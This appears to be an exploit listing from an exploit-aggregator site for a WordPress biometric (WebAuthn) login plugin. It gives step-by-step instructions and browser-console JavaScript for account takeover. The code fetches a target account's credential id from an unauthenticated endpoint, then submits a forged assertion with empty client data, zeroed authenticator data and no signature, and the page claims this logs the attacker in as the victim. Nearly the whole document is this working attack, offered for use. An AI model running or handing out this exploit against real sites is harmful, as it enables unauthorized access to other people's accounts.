## https://sploitus.com/exploit?id=WPEX-ID:0F0FEEC8-869C-4D10-AE28-E41A6D29CB6E
With the target site open in a browser tab (not logged in), paste the following into the browser's developer console. Replace 'TARGET_EMAIL@DOMAIN.TLD' with the email address of the account you are targeting. That account must have WebAuthn (biometric) login enabled, because the first request relies on the plugin returning a registered credential id for that email.

```javascript
// Step 1: the unauthenticated login endpoint returns the WebAuthn request options
// for any email address, which includes the target account's credential id.
const id = (await (await fetch(
  '/wp-admin/admin-ajax.php?action=fme_wbl_login_using_biometric&user_email=TARGET_EMAIL@DOMAIN.TLD'
)).json()).publicKey.allowCredentials[0].id.split('?')[3];

// Step 2: send the verify endpoint a fabricated assertion. clientDataJSON "e30=" is
// base64 for "{}", authenticatorData is all zero bytes, and no signature is included.
fetch(
  '/wp-admin/admin-ajax.php?action=fme_wbl_verify_using_biometric&user_name=TARGET_EMAIL@DOMAIN.TLD&auth_data=' +
  JSON.stringify({
    clientDataJSON: 'e30=',
    authenticatorData: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==',
    id,
  })
);
```

After refreshing the page you are logged in as that user: the verify endpoint accepted an assertion with an empty clientDataJSON, zeroed authenticator data and no signature, so no possession of the registered authenticator was ever proven.